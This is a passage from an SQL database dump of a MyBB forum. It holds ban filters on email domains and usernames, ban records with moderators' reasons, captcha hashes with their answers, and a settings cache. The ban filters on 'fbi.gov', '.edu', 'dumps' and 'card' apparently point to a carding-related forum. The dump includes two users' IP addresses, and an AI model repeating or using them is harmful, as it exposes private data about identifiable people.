'1345059593', '1341495238'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('5', '*fbi.gov', '3', '0', '1339730928'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('29', '*teleworm.us', '3', '1349440202', '1341495258'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('7', 'J0k3r', '2', '0', '1339730969'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('85', '*dick*', '2', '0', '1349745164'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('9', '*.ru', '3', '0', '1341494791'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('10', '*myway.com', '3', '0', '1341494800'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('11', '*mailinator2.com', '3', '0', '1341494814'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('12', '*sogetthis.com', '3', '0', '1341494843'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('13', '*mailinator.net', '3', '0', '1341494855'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('16', '*spamherelots.com', '3', '0', '1341494940'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('15', '*thisisnotmyrealemail.com', '3', '0', '1341494919'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('17', '*spambox.us', '3', '0', '1341495003'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('18', '*NoSpamfor.Us', '3', '0', '1341495021'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('19', '*guerrillamailblock.com', '3', '0', '1341495035'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('20', '*jetable.com', '3', '0', '1341495045'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('21', '*hotmial.com', '3', '0', '1341495055'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('22', '*hotmai.com', '3', '0', '1341495087'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('23', '*mintemail.com', '3', '0', '1341495096'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('24', '*meltmail.com', '3', '0', '1341495105'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('25', '*sify.com', '3', '0', '1341495112'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('26', '*binkmail.com', '3', '0', '1341495120'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('27', '*spamgourmet.com', '3', '0', '1341495131'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('30', '*rediffmail.com', '3', '0', '1341495380'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('31', '*spamfree24', '3', '0', '1341495389'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('32', '*jetable.org', '3', '0', '1341495398'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('33', '*tempinbox.com', '3', '0', '1341495406'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('34', '*mailexpire.com', '3', '0', '1341495416'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('35', '*yopmail.com', '3', '1352555072', '1341495424'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('36', '*bofthew.com', '3', '0', '1341495433'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('37', '*safe-mail.net', '3', '0', '1341495481'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('38', '*trash-mail.com', '3', '0', '1341495489'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('39', '*spam.la', '3', '0', '1341495496'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('40', '*mailcatch.com', '3', '0', '1341495504'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('41', '*goemailgo.com', '3', '0', '1341495522'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('42', '*thankyou2010.com', '3', '0', '1341495529'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('43', '*emailthe.net', '3', '0', '1341495538'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('44', '*gmil.com', '3', '0', '1341495623'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('45', '*dispostable.com', '3', '0', '1341495656'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('46', '*anonymbox.com', '3', '0', '1341495664'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('47', '*lhsdv.com', '3', '0', '1341495671'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('48', '*gamil.com', '3', '0', '1341495677'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('49', '*0-mail.com', '3', '0', '1341495685'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('50', '*makemetheking.com ', '3', '0', '1341495696'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('51', '*djrabbit.info', '3', '0', '1341495703'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('52', '*quickinbox.com', '3', '0', '1341495713'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('53', '*zippymail.info', '3', '1348522369', '1341495721'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('54', '*mailinator.com', '3', '1352018570', '1341495735'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('55', '*emeraldwebmail.com', '3', '0', '1341495744'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('56', '*bobmail.info', '3', '0', '1341495775'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('57', '*suremail.info', '3', '0', '1341495781'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('58', '*pjjkp.com', '3', '0', '1341495788'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('59', '*163.com', '3', '0', '1341495795'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('60', '*tradermail.info', '3', '0', '1341495802'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('61', '*hush.ai', '3', '0', '1341495811'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('62', '*incognitomail.org', '3', '0', '1341495821'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('63', '*wegwerfemail.de', '3', '0', '1341495830'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('64', '*safetymail.info', '3', '0', '1341495839'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('65', '*keepmymail.com', '3', '1352555108', '1341495854'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('66', '*jnxjn.com', '3', '0', '1341495861'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('67', '*appspotmail.com', '3', '0', '1341495872'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('69', '*o2.pl', '3', '1346283062', '1341496691'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('70', 'dump', '2', '0', '1344011186'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('71', 'fbi*', '2', '0', '1344011210'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('72', 'suck*', '2', '1350576598', '1344011226'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('73', '*.edu', '3', '1351343867', '1344427262'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('74', '*dumps', '3', '1346898960', '1344427341'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('75', '*gmx.com', '3', '1349107391', '1345818466'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('76', 'sell*', '2', '0', '1346768396'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('77', 'card*', '2', '0', '1346768402'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('78', 'dumps*', '2', '0', '1346768414'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('79', '*dumps', '2', '0', '1346768419'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('80', '*card', '2', '0', '1346768425'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('81', '*stuff', '2', '0', '1346768444'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('82', '97.255.20.208', '1', '0', '1349656109'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('83', '*speed.1s.fr', '3', '1349661663', '1349661576'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('84', '*jok3r*', '2', '1349739428', '1349735158'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('86', '*craves*', '2', '0', '1349745189'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('87', '*rocketmail.com', '3', '0', '1351136092'); INSERT INTO `mybb_banfilters` (`fid`, `filter`, `type`, `lastuse`, `dateline`) VALUES ('88', '71.67.179.16', '1', '1352760423', '1352254422'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_banned`; CREATE TABLE `mybb_banned` ( `uid` int(10) unsigned NOT NULL DEFAULT '0', `gid` int(10) unsigned NOT NULL DEFAULT '0', `oldgroup` int(10) unsigned NOT NULL DEFAULT '0', `oldadditionalgroups` text NOT NULL, `olddisplaygroup` int(11) NOT NULL DEFAULT '0', `admin` int(10) unsigned NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `bantime` varchar(50) NOT NULL DEFAULT '', `lifted` bigint(30) NOT NULL DEFAULT '0', `reason` varchar(255) NOT NULL DEFAULT '', KEY `uid` (`uid`), KEY `dateline` (`dateline`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_banned` WRITE; INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('108', '14', '5', '', '0', '1', '1346768917', '---', '0', 'Multi Accounting (Proof: Time and gmx.com spam email)'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('157', '14', '5', '', '0', '1', '1346769145', '---', '0', 'Spammer'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('176', '0', '5', '', '0', '1', '1346968852', '---', '0', 'Fake E-Mails'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('177', '0', '5', '', '0', '1', '1346968852', '---', '0', 'Fake E-Mails'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('179', '0', '5', '', '0', '1', '1347077544', '---', '0', 'Spam Email'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('211', '0', '5', '', '0', '1', '1349496249', '---', '0', '20 Minute Mail? Good Bye Spam'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('231', '7', '2', '', '0', '1', '1350428750', '0-2-0', '1355007900', 'Take a look here: http://pastebin.com/sftb2X5x'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('243', '7', '5', '', '0', '1', '1349734513', '---', '0', 'gujvgrrgt'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('203', '7', '2', '18,17,20,13', '0', '61', '1349924553', '0-0-1', '1381460520', 'Threatning to DDoS our site.'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('249', '7', '2', '', '0', '1', '1350093593', '0-2-0', '1355367540', 'Kicked out of AF but still active on AF? Very legit.'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('254', '14', '9', '17', '17', '1', '1351630198', '---', '0', 'Scammers are not welcome.'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('266', '7', '2', '', '0', '1', '1350450377', '---', '0', 'Oh Off course you can talk to my staff by taking their Skype IDs and not PMing them also offering them to leave LH and go on AF.'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('251', '14', '2', '', '0', '1', '1350525399', '---', '0', 'Sorry but you are not welcome to LH due to security reasons.'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('224', '14', '2', '', '0', '1', '1350760616', '---', '0', 'Thanks for the offer. Bye.'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('214', '14', '2', '17', '2', '1', '1351038873', '---', '0', 'Leeching.'); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('302', '14', '2', '', '0', '1', '1352253808', '---', '0', 'Leechers not allowed + Multi Accounting '); INSERT INTO `mybb_banned` (`uid`, `gid`, `oldgroup`, `oldadditionalgroups`, `olddisplaygroup`, `admin`, `dateline`, `bantime`, `lifted`, `reason`) VALUES ('328', '14', '2', '', '0', '1', '1352258991', '---', '0', 'Multi Accounting. Do not come back!'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_calendarpermissions`; CREATE TABLE `mybb_calendarpermissions` ( `cid` int(10) unsigned NOT NULL DEFAULT '0', `gid` int(10) unsigned NOT NULL DEFAULT '0', `canviewcalendar` int(1) NOT NULL DEFAULT '0', `canaddevents` int(1) NOT NULL DEFAULT '0', `canbypasseventmod` int(1) NOT NULL DEFAULT '0', `canmoderateevents` int(1) NOT NULL DEFAULT '0' ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_calendarpermissions` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_calendars`; CREATE TABLE `mybb_calendars` ( `cid` int(10) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL DEFAULT '', `disporder` int(10) unsigned NOT NULL DEFAULT '0', `startofweek` int(1) NOT NULL DEFAULT '0', `showbirthdays` int(1) NOT NULL DEFAULT '0', `eventlimit` int(3) NOT NULL DEFAULT '0', `moderation` int(1) NOT NULL DEFAULT '0', `allowhtml` int(1) NOT NULL DEFAULT '0', `allowmycode` int(1) NOT NULL DEFAULT '0', `allowimgcode` int(1) NOT NULL DEFAULT '0', `allowvideocode` int(1) NOT NULL DEFAULT '0', `allowsmilies` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`cid`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_calendars` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_captcha`; CREATE TABLE `mybb_captcha` ( `imagehash` varchar(32) NOT NULL DEFAULT '', `imagestring` varchar(8) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', KEY `imagehash` (`imagehash`), KEY `dateline` (`dateline`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_captcha` WRITE; INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('c66dfed8645b389313371446b8de3809', 'nY8Ul', '1352431678'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('5a4359aa96e02d1fd9a521bf08aa78d9', 'rjord', '1352304397'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('499f902c2d9e509bfc209ba186a342fc', 'DDQji', '1352324682'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('07702d84b9a8ffb3681bc290e130f555', 'DBdz7', '1352519243'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('f9756e797546204085ecf1635f1b64e3', 'vvP74', '1352646498'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('1d29fde03dc5a9f6e5b8a13bd1729ae2', 'VYpCh', '1352649130'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('eaaa807ec33738be21973f20e127c70f', 'UJDJJ', '1352659899'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('fc510268695b51e73acbd2e4d18ec342', 'jbEHE', '1352761446'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('bef96fbc57572f46fe1cdc277ec4b1f5', 'njddX', '1352762461'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('7191a9c376d222094ca82482782c5ade', 'XiKIV', '1352352624'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('9d66a56f0f60a5cb1cf01c1d6c938609', 'Tkx3t', '1352625792'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('a8a77b94721ffee30b99d85f50134878', 'bcwhF', '1352226096'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('7b2cf227cead64e78f00cf3337752622', 'qM6Ay', '1352253382'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('2141050bf74ec88ac631d6460c983094', '38sxV', '1352296719'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('5b74bb792abb854a6a96adc4ec58d9a1', 'hiRBk', '1352442655'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('dae86cb7d80e14bfb8c521b4cfe2e861', 'VXtyX', '1352522800'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('d5d43a23d972c359c3c61f6a98a205b9', 'M4DgU', '1352522801'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('9f9fe9770d8777c04b8c91715d756928', '7CAI4', '1352528992'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('88841b3b9c3e6fe6c398d9e7c3c499ae', 'LCPb8', '1352554421'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('ef2c08bb6abfadd65868e45a4a3c1f17', 'jJuVH', '1352597518'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('40bc75e2c66374948bbca2b27c6227b8', 'tRwqA', '1352665648'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('3be6de7af5f841fa480e1a2d14b76472', 'd9rW5', '1352765175'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('c7bb2542df4d1f3d75b6116e5633922e', 'H3oZp', '1352765651'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('c92e397ca9da3238a167b3aa1d592e13', 'ANuAd', '1352769179'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('d8fc48500b2e146a1bd5acec93273f68', 'KqGeS', '1352769219'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('05a5ffe67b34253ad0b4d00e486615e7', 'xbjva', '1352769225'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('de5a250eb710d92f89c93a905542a9cb', 'xWr6y', '1352769235'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('ff56db33717c890f36e2b4ef28e0c092', 'eVfuk', '1352769458'); INSERT INTO `mybb_captcha` (`imagehash`, `imagestring`, `dateline`) VALUES ('90bb21ccaf27fa5e93ad7c592d31538c', 'hqeJT', '1352782411'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_datacache`; CREATE TABLE `mybb_datacache` ( `title` varchar(50) NOT NULL DEFAULT '', `cache` mediumtext NOT NULL, PRIMARY KEY (`title`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_datacache` WRITE; INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('version', 'a:2:{s:7:\"version\";s:5:\"1.6.8\";s:12:\"version_code\";i:1608;}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('attachtypes', 'a:20:{s:3:\"zip\";a:6:{s:4:\"atid\";s:1:\"1\";s:4:\"name\";s:8:\"ZIP File\";s:8:\"mimetype\";s:15:\"application/zip\";s:9:\"extension\";s:3:\"zip\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/zip.gif\";}s:3:\"jpg\";a:6:{s:4:\"atid\";s:1:\"2\";s:4:\"name\";s:9:\"JPG Image\";s:8:\"mimetype\";s:10:\"image/jpeg\";s:9:\"extension\";s:3:\"jpg\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:3:\"txt\";a:6:{s:4:\"atid\";s:1:\"3\";s:4:\"name\";s:13:\"Text Document\";s:8:\"mimetype\";s:10:\"text/plain\";s:9:\"extension\";s:3:\"txt\";s:7:\"maxsize\";s:3:\"200\";s:4:\"icon\";s:26:\"images/attachtypes/txt.gif\";}s:3:\"gif\";a:6:{s:4:\"atid\";s:1:\"4\";s:4:\"name\";s:9:\"GIF Image\";s:8:\"mimetype\";s:9:\"image/gif\";s:9:\"extension\";s:3:\"gif\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:3:\"php\";a:6:{s:4:\"atid\";s:1:\"6\";s:4:\"name\";s:8:\"PHP File\";s:8:\"mimetype\";s:23:\"application/x-httpd-php\";s:9:\"extension\";s:3:\"php\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:26:\"images/attachtypes/php.gif\";}s:3:\"png\";a:6:{s:4:\"atid\";s:1:\"7\";s:4:\"name\";s:9:\"PNG Image\";s:8:\"mimetype\";s:9:\"image/png\";s:9:\"extension\";s:3:\"png\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:3:\"doc\";a:6:{s:4:\"atid\";s:1:\"8\";s:4:\"name\";s:23:\"Microsoft Word Document\";s:8:\"mimetype\";s:18:\"application/msword\";s:9:\"extension\";s:3:\"doc\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/doc.gif\";}s:3:\"htm\";a:6:{s:4:\"atid\";s:1:\"9\";s:4:\"name\";s:8:\"HTM File\";s:8:\"mimetype\";s:9:\"text/html\";s:9:\"extension\";s:3:\"htm\";s:7:\"maxsize\";s:3:\"100\";s:4:\"icon\";s:27:\"images/attachtypes/html.gif\";}s:4:\"html\";a:6:{s:4:\"atid\";s:2:\"10\";s:4:\"name\";s:9:\"HTML File\";s:8:\"mimetype\";s:9:\"text/html\";s:9:\"extension\";s:4:\"html\";s:7:\"maxsize\";s:3:\"100\";s:4:\"icon\";s:27:\"images/attachtypes/html.gif\";}s:4:\"jpeg\";a:6:{s:4:\"atid\";s:2:\"11\";s:4:\"name\";s:10:\"JPEG Image\";s:8:\"mimetype\";s:10:\"image/jpeg\";s:9:\"extension\";s:4:\"jpeg\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:2:\"gz\";a:6:{s:4:\"atid\";s:2:\"12\";s:4:\"name\";s:20:\"GZIP Compressed File\";s:8:\"mimetype\";s:18:\"application/x-gzip\";s:9:\"extension\";s:2:\"gz\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/tar.gif\";}s:3:\"tar\";a:6:{s:4:\"atid\";s:2:\"13\";s:4:\"name\";s:19:\"TAR Compressed File\";s:8:\"mimetype\";s:17:\"application/x-tar\";s:9:\"extension\";s:3:\"tar\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/tar.gif\";}s:3:\"css\";a:6:{s:4:\"atid\";s:2:\"14\";s:4:\"name\";s:14:\"CSS Stylesheet\";s:8:\"mimetype\";s:8:\"text/css\";s:9:\"extension\";s:3:\"css\";s:7:\"maxsize\";s:3:\"100\";s:4:\"icon\";s:26:\"images/attachtypes/css.gif\";}s:3:\"pdf\";a:6:{s:4:\"atid\";s:2:\"15\";s:4:\"name\";s:17:\"Adobe Acrobat PDF\";s:8:\"mimetype\";s:15:\"application/pdf\";s:9:\"extension\";s:3:\"pdf\";s:7:\"maxsize\";s:4:\"2048\";s:4:\"icon\";s:26:\"images/attachtypes/pdf.gif\";}s:3:\"bmp\";a:6:{s:4:\"atid\";s:2:\"16\";s:4:\"name\";s:12:\"Bitmap Image\";s:8:\"mimetype\";s:9:\"image/bmp\";s:9:\"extension\";s:3:\"bmp\";s:7:\"maxsize\";s:3:\"500\";s:4:\"icon\";s:28:\"images/attachtypes/image.gif\";}s:4:\"docx\";a:6:{s:4:\"atid\";s:2:\"17\";s:4:\"name\";s:28:\"Microsoft Word 2007 Document\";s:8:\"mimetype\";s:71:\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\";s:9:\"extension\";s:4:\"docx\";s:7:\"maxsize\";s:4:\"1024\";s:4:\"icon\";s:26:\"images/attachtypes/doc.gif\";}s:3:\"xls\";a:6:{s:4:\"atid\";s:2:\"18\";s:4:\"name\";s:24:\"Microsoft Excel 